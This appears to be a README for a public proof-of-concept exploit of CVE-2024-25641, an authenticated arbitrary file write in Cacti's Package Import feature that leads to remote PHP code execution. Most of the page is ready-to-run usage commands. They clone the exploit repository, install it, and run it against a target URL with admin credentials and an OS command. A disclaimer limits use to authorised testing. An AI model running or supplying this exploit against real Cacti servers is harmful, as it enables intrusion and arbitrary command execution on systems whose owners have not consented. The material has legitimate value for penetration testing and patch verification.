Share
## https://sploitus.com/exploit?id=0527C9DD-2777-50CF-AF15-D46ECBBA0C8A
# CVE-2024-25641 - Cacti 1.2.26 - Arbitrary file write to RCE ๐ŸŒต

- [x] `Authenticated RCE`
- [x] `Cacti version < v1.2.26`

## Summary
___

An arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).


## Proof Of Concept
___

![CVE DEMO](https://github.com/user-attachments/assets/1ee4800b-4fc1-4bf4-8b7a-a4e5999143e9)

## Usage
___

```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

pip install -r requirements.txt

python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```

### With poetry
```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

poetry install

poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```

## DISCLAIMER
This tool is intended for educational and testing purposes only. The author of this tool is not responsible for any misuse or illegal activities performed with it. Use this tool only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.